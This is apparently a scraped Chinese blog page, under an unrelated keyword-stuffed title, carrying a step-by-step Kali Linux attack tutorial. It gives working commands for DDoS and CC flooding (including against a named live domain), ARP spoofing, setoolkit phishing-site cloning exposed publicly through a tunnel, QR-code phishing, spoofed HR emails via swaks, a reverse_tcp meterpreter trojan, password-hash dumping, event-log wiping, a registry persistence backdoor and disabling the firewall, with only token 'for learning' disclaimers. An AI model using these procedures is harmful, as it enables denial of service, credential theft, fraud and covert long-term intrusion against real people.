js建设网站windows2008 iis 网站
- 作者: 多梦笔记
- 时间: 2026年02月17日 05:13
当前位置: 首页 > news >正文
js建设网站,windows2008 iis 网站,app开发公司q1654534794下拉推广,制作网站要多少费用文章目录 前言Kali常见攻击手段1 网络攻击手段1.1 DDos攻击1.2 CC攻击1.3 ARP欺骗 2 社会工程学攻击#xff08;setoolkit#xff09;2.1 搭建钓鱼网站①进入setoolkit②选择社会工程学攻击 - 网络攻击 - 钓鱼网站③站点克隆④kali获取用户名、密码⑤结合内网穿透实现公网可访… 文章目录 前言Kali常见攻击手段1 网络攻击手段1.1 DDos攻击1.2 CC攻击1.3 ARP欺骗 2 社会工程学攻击setoolkit2.1 搭建钓鱼网站①进入setoolkit②选择社会工程学攻击 - 网络攻击 - 钓鱼网站③站点克隆④kali获取用户名、密码⑤结合内网穿透实现公网可访问⑥公网钓鱼⑦克隆网站命令全过程 2.2 二维码2.3 钓鱼邮件2.4 远程木马2.4.1 生成木马并上传到靶机2.4.2 执行木马操控主机2.4.3 日志清除2.4.4 创建后门2.4.5 常用命令 1️⃣零基础入门① 学习路线② 路线对应学习视频 2️⃣视频配套资料国内外网安书籍、文档① 文档和书籍资料② 黑客技术 3️⃣网络安全源码合集工具包4️⃣网络安全面试题资料领取 前言
Kali常见攻击手段 注意:仅用于教程和科普切勿做违法之事否则后果自负 1 网络攻击手段 请正确使用DDos和CC攻击不要用来做违反当地法律法规的事情否则后果自负 使用之前kali需要能够上网 参考:kali安装 1.1 DDos攻击
打开命令行下载对应ddos数据包
git clone https://github.com/Andysun06/ddos
进入数据包对应的文件夹区分大小写
cd ddos
执行脚本 本文用于演示的kali是2020年版本用python执行ddos-p2.py输入命令
python ddos-p2.py 然后会出现如下界面
然后输入攻击对象的IP本教程以我的网站为例
再打开一个命令行窗口
ping 域名
得到ip 配置参数
ip: 攻击对象Attack Port即攻击端口一般服务器默认为80更多内容请百度Attack Speed即攻击速度数值越大越快最大不能超过1000
发起攻击 按下回车出现如下界面表示攻击成功 1.2 CC攻击 DDoS攻击的一种类型CC (ChallengeCollapsar挑战黑洞)攻击是DDoS攻击的一种类型使用代理服务器向受害服务器发送大量貌似合法的请求 以root身份打开命令行输入命令
ab -n 参数1 -c 参数2 网站地址
参数一是并发数请求的用户量 参数二是发送总量请求的总次数 有兴趣的可以在百度上另外学习 参数1参数2和网站地址由自己设置这里以 10001000http://bjvcrrn.nat.ipyingshe.com/bbs/ 为例 出现如下界面表示攻击成功 DDos与CC攻击区别 1CC攻击流量不大真实IP 通常是应用层攻击攻击对象是网页涉及的协议主要是HTTPHTTPS消耗的是服务器的CPU资源通过请求大量调用CPU的资源例如查询数据库 2DDOS攻击流量很大伪造IP 通常是网络层和传输层攻击对象是IP涉及协议主要是IPUDP和TCP通常消耗的是网络带宽 1.3 ARP欺骗 首先ARP欺骗需要用到dsniff数据包arpspoof 是 dsniff 的一个附属工具所以我们需要安装的是 dsniff安装命令如下 安装dsniff
apt-get install dsniff -y
确定网卡名称和地址
ifconfig 嗅探ip设备 嗅探你所在WLAN下所有设备的IP地址命令如下 fping -g 本机IP地址/24 例如我的IP是192.168.145.98命令就是fping -g 192.168.145.98⁄24 我的另一台设备就出现在了这里192.168.145.26是一台PCcentos
发起攻击 发起攻击之前先查看我192.168.145.26目标主机的网速 结果基本耗时在50ms左右
输入命令发起攻击
arpspoof -i 你的网卡名称 -t 攻击目标的IP地址 攻击目标的网关地址
网卡名称的查看上文已经提过我以我的网卡为例名称是eth0攻击目标就是我的另一台PCIP是192.168.145.26 因为我用的是虚拟机并且我PC的网关配置的是192.168.145.2因此我攻击命令如下一般来说网关配置为xxx.xxx.xxx.1,也就是ip最后一位改为1 arpspoof -i eth0 -t 192.168.145.26 192.168.145.2
按下回车发起攻击出现如下页面表示攻击成功 查看效果 现在我的另一台PC基本上无法上网了这就说明我们的ARP欺骗成功了。 如果你想停止攻击就按下CtrlZ攻击就停止了。
2 社会工程学攻击setoolkit
2.1 搭建钓鱼网站 钓鱼网站是黑客常用的用于盗取目标用户名与账号的方式今天主要介绍setoolkit来制作钓鱼网站 setoolkit是kali下的社会工程学工具集。 ①进入setoolkit
命令行输入
setoolkit ②选择社会工程学攻击 - 网络攻击 - 钓鱼网站 社会工程学攻击
快速追踪测试
第三方模块
升级软件
升级配置
帮助123456
在上图中我们选择1社会工程学攻击进入到下图页面
鱼叉式网络攻击
网页攻击
传染媒介式
建立payload和listener
邮件群发攻击
Arduino基础攻击
无线接入点攻击
二维码攻击
Powershell攻击
第三反方模块12345678910
上图中输入2选择社会工程学中的网络攻击进入到下图页面
Java applet攻击
Metasploit浏览器攻击
钓鱼网站攻击
标签钓鱼攻击
网站jacking攻击
多种网站攻击
全屏幕攻击1234567
上图中选择3进入钓鱼网站攻击进入下图页面 网站模板
站点克隆
用自己的网站123
如果选择网站模板的话会有几个默认的登陆界面的模板 如果想克隆指定的页面的话就选择2站点克隆当然这个功能虽然强大但是有的网站是无法克隆的如果无法克隆就选择3自己制作一样的网站去钓鱼。这里我详细讲一下站点克隆的方法。 登录页面模板 输入2选择google登录模板 kali监听效果
③站点克隆 选择完2之后需要我们输入一些信息 上图中选择2选择网站克隆进入如下页面
这个是我们克隆完之后的网站返回的ip地址一般就写虚拟机的IP地址
此处我的虚拟机ip为192.168.145.98
这个是我们克隆完之后的网站返回的ip地址一般就写虚拟机的IP地址然后我们需要填写想要克隆的网站的url
回车之后显示如下信息就代表克隆完成 ④kali获取用户名、密码 我们将账号和密码都设为admin点击登陆发现有跳转到了真正的页面也不会返回账号信息错误的界面同时kali也将我们输入的信息截获了并在终端显示 ⑤结合内网穿透实现公网可访问 本次使用DVWA的登录页面试验 内网穿透工具选择花生壳 到官网上下载花生壳并安装 花生壳官网 新增映射 使用https映射认证 该服务需要花费6元 配置映射 内网主机ip填写kali的ip即可
所以这里就只需要我们将kali的IP以及端口(80)填入即可映射到外网了
但是前面也说过http协议是收费的6块但是能用很久个人觉得倒是不贵。
好那现在就让我们去到最后一步用Custom Import和花生壳去 钓 鱼 ~~
⑥公网钓鱼 注意本文仅供学习之用严禁做违法之事 资料
一、DVWA
链接: https://pan.baidu.com/s/1URPTFthsmPU3_F54Tsyvgg?pwd12wx 提取码: 12wx 复制这段内容后打开百度网盘手机App操作更方便哦
–来自百度网盘超级会员v5的分享将dvwa文件拖至/root目录下如果拖拽有问题上文有请自行查阅 开启setoolkit
①. 打开终端输入setoolkit
②. 选择1社会工程学攻击
③. 选择2网站攻击
④选择3钓鱼网站
⑤选择3用户导入【默认回车即可】
⑥选择导入的路径【/root/dvwa】
⑦选择2导入整个文件夹
⑧配置内网穿透
⑨通过域名访问查看kali监听结果 选择3用户导入之后会出现如下页面如果是默认直接回车即可 如果默认就直接回车。如果选择域名就需要将域名解析到该主机 我们默认直接回车 下面我们选择2导入整个文件夹 配置内网穿透服务 测试结果
输入网址访问https://*.*.fun/ ⑦克隆网站命令全过程 如果想要实现公网钓鱼参照⑥即可 1. setoolkit
输入1
输入2
输入3
输入2
输入kali虚拟机ip或自己搭建的kali的ip
输入克隆的网站地址
通过kali的ip访问克隆网站地址 原网站 克隆网站 大家也可以看到钓鱼网站的制作其实并不难所以我们平常在访问一些常用的有账号登陆的地方一定要看清楚url防止被钓鱼。 2.2 二维码 SET 工具包中使用QR Code Attack模块发起二维码攻击使被欺骗用户扫描你的二维码进入一个伪装钓鱼网站。有人肯定会认为那这个软件没啥用但是请问正常情况下给你一个二维码和一个未知网址你更愿意相信哪一个答案当然是二维码。 以下是对应命令
setoolkit
输入1,社会工程学攻击
输入8二维码攻击
输入对应网站url以合天为例www.hetianlab.com 二维码生成路径默认/root/.set/reports/ 结果 然而使用手机微信扫描出来的结果如下 需要使用手机UC浏览器扫描才可以跳转到相应网站。 以上 Kali 显得太垃圾了……推荐一个在线二维码生成平台(草料二维码生成)可生成在微信即可扫描并跳转的二维码并且种类丰富大可为所欲为。 生成的二维码在手机微信扫描的效果如下 【小结】以上的攻击演示告诉我们几点 不要轻易打开一个安全性未知的网站链接或者去扫描二维码并且傻乎乎地输入自己的账号密码等敏感信息你看到的网站不一定是真的现实中攻击者会绑定公网IP、公网域名来以假乱真同时请务必留意不要轻易连接安全性未知的WIFI因为一旦你进入攻击者设定的WIFI攻击者完全可以利用局域网内部的DNS欺骗攻击使得你访问www.baidu.com这样的域名都能跳转到他指定的钓鱼网站 2.3 钓鱼邮件 当攻击者制作了钓鱼网站、木马程序后便会想法设法将其传给受害者而常见的传播方式便是钓鱼网站了。安全意识较差的用户在收到钓鱼邮件后点击邮件中的钓鱼链接、下载附件中的木马程序便可能遭受攻击 工具简述 Swaks 是一款类似于“瑞士军刀”的工具之所以这么说是因为它在SMTP邮件协议领域有非常非常广泛的应用同时对于一名信息安全高级工程师来说也是一个不错的利用工具它通常被用来伪造邮件进行钓鱼、社工等操作。 Swaks基本用法 1、swaks –to testqq.com 测试邮箱的连通性 2、参数说明这里只是简单的罗列了一些至于更加具体的内容可以使用–help进行查看了解 –from testqq.com //发件人邮箱 –ehlo qq.com //伪造邮件ehlo头即是发件人邮箱的域名。提供身份认证 –body http://www.baidu.com //引号中的内容即为邮件正文 –header Subject:hello //邮件头信息subject为邮件标题 –data ./Desktop/email.txt //将正常源邮件的内容保存成TXT文件再作为正常邮件发送 kali内置了swaks查看版本swaks -v 创建一个临时邮箱用于接收邮件 创建地址https://www.linshi-email.com/ 发起攻击 伪造一份来自 360hr 的邮件收件人为vkshnixybjiubridge.com内容为:“Congratulations on your 360 interview. Please click on the link below to enter our employee information page. https://fishing.com/test.php”如下图所示 swaks –to vkshnixybjiubridge.com –from hrbaidu.cn –ehlo baidu.cn –body this is your Offer, please click on the link below to enter our employee information page. https://baidu.com 查看临时邮箱此时可以收到邮件消息
“”:swaks输出的信息行 “*“:swaks中产生的错误 ” -”:发送到目标的预期行(无错误) “- “:服务器的预期回复(无错误) “**”:服务器返回的错误信息 拓展发送邮件的时候添加上附件–attach swaks –to qeolcz47062chacuo.net –from hr360.cn –ehlo 360.cn –body this is your offer.please open the attach –attach offer.txt offer.txt需要在当前目录下 点开邮件 但是QQ邮箱和网易云邮箱暂不可送达应该是腾讯、网易设定的安全机制的原因在此提醒遇到可疑邮件要查看源邮件判断发信人IP是否为可信任的IP不然一个贸然的操作有时候将可能导致自己被钓鱼甚至攻击 2.4 远程木马 SET 同时集成了木马生成工具可以生成木马并调用MSF框架对远程主机进行控制。 2.4.1 生成木马并上传到靶机set
选择1社会工程学攻击
选择4创建攻击载荷和监听器
选择2攻击模式选择reverse_tcp meterpreter
输入ip地址监听的主机ipkali的ip地址和端口随机只要不被占用即可 默认生成木马地址root/.set 将木马上传到靶机
2.4.2 执行木马操控主机 双击执行木马查看结果 激活 Meterpreter 会话获得 Shell 后即可操控 Win 7 靶机如下图所示 # 选择会话中的第一个目标 sessions -i 1 操纵主机 可输入help命令查看 Meterpreter 支持的所有攻击命令和描述 截图效果 执行getsystem进行提权攻击 获取密码(windows的密码其实就是藏在一个目录下的hash值) 执行命令hashdump尝试获取系统所有账户的密码的hash值发现失败。没关系可以执行Meterpreter 提供的脚本 远程监控win7 run vnc 进一步的攻击还可以执行background将当前会话转移到后台执行达到后台进程切换的目的。同时可以执行migrate 命令迁移会话进程到指定的进程pid达到隐藏控制会话的进程此时原来的进程是看不到的目的(通过ps命令可以看到受害机的哪些进程) 2.4.3 日志清除 为了不暴露攻击者的痕迹行为需要清除系统事件 先打开 Windows 事件查看器查看清理之前的日志记录 win r输入eventvwr 在 Meterpreter 执行命令 clearev 命令对靶机的日志进行清除如下图所示 但该命令存在的弊端的是没法指定清除哪一部分的日志一次性清除容易引起系统管理员的注意。 注意如果不小心ctrlZ退出了控制台可以通过如下命令恢复jobs 查看当前被挂起的进程对应的号码
jobs# 将任务调至前台继续运行 fg %jobnumber是命令编号不是进程号 如果不小心退出了msf的会话重新打开setoolkit设置相同的ip和端口即可恢复 2.4.4 创建后门 当成功获取目标系统的访问权限后需要寻找方法来恢复与目标主机的连接而无需再进入目标系统。如果目标用户破坏了该连接例如重新启动计算机此时使用后门将允许自动重新与目标系统建立连接。为了后续渗透方便所以需要创建一个后门这样即使连接被中断也不会影响工作。 创建持久后门之前先查看下它的帮助文件如下所示 run persistence -h 执行命令创建一个持久后门输出的信息将显示创建后门的一个过程。Kali 将在目标系统中创建了一个持久脚本 (保存在C:\Users\thinkpad\AppData\Local\Temp\naBffRVEO.vbs)并篡改注册表如下所示 run persistence -X -i 5 -p 9000 -r 192.168.145.98(kali渗透机的ip) 查看 Win 7 靶机的注册表和系统文件 为了验证后门是否可利用关闭当前攻击会话重启 Win 7 虚拟机 此时在 Kali 虚拟机重新开启一个终端运行 MSF 框架监听 Win 7 虚拟机是否重启后能自动上线获得攻击会话 至此后门植入成功以后只要Win 7系统开机便会自动运行后门脚本攻击者可以随时入侵除非受害主机的管理员发现后删除了注册表相应的键值和系统中植入的后门脚本。此时即使 Win 7 靶机中的远控木马文件 payload.exe 被管理员删除也没关系只不过功能受限 2.4.5 常用命令 运行虚拟桌面run vnc获取hash值run hashdump查看文件夹ls将会话置于后台background查看运行时间idletime查看当前用户身份getuid查看当前用户具备的权限getprivs查看当前进程PIDgetpid查看目标机系统信息sysinfo查看正在运行的进程ps搜寻、拷贝、上传文件需要拥有system权限可以利用getsystem、MS16-032漏洞进行提权1搜寻c盘内所有以txt为后缀的文件search -f *.txt -d c:\2拷贝文件至kali内download c:\1.txt /root3上传文件至win7upload /home/zidian/msfadmin.txt c:\重启/关机reboot / shutdown -h now进入cmdshell 获取cmd之后的常用命令 查看当前用户whoami添加用户和对应密码net user [username] [password] /add查看当前计算机中的详细情况systeminfo关闭防火墙netsh adcfirewall set allprofiles state off查看当前计算机中网络连接通信情况netstat -ano msf常用命令 参考https://cloud.tencent.com/developer/article/1808932 https://www.freebuf.com/articles/network/317596.html 参考文章 https://blog.csdn.net/a_n_d_y_s_u_n__/article/details/118528019 CSDN大礼包《黑客网络安全入门进阶学习资源包》文末免费下载 1️⃣零基础入门 ① 学习路线 对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。 ② 路线对应学习视频 同时每个成长路线对应的板块都有配套的视频提供 因篇幅有限仅展示部分资料 2️⃣视频配套资料国内外网安书籍、文档 ① 文档和书籍资料 ② 黑客技术 因篇幅有限仅展示部分资料 3️⃣网络安全源码合集工具包 4️⃣网络安全面试题 资料领取 上述这份完整版的网络安全学习资料已经上传网盘朋友们如果需要可以微信扫描下方二维码 即可自动领取↓↓↓ 或者 【点此链接】领取
- 上一篇: js博客网站开发计划书网站建设源程序清单
- 下一篇: js统计网站访问人数江西省赣州市瑞金市
相关文章
-
js博客网站开发计划书网站建设源程序清单
js博客网站开发计划书网站建设源程序清单
- 站长
- 2026年02月17日
-
jsp做物流网站可以做锚文本链接的网站
jsp做物流网站可以做锚文本链接的网站
- 站长
- 2026年02月17日
-
jsp做网站怎么打开小型局域网组建方案
jsp做网站怎么打开小型局域网组建方案
- 站长
- 2026年02月17日
-
js统计网站访问人数江西省赣州市瑞金市
js统计网站访问人数江西省赣州市瑞金市
- 站长
- 2026年02月17日
-
js网站记住密码怎么做法国企业网站建设
js网站记住密码怎么做法国企业网站建设
- 站长
- 2026年02月17日
-
js网站模板怎么用重装wordpress
js网站模板怎么用重装wordpress
- 站长
- 2026年02月17日
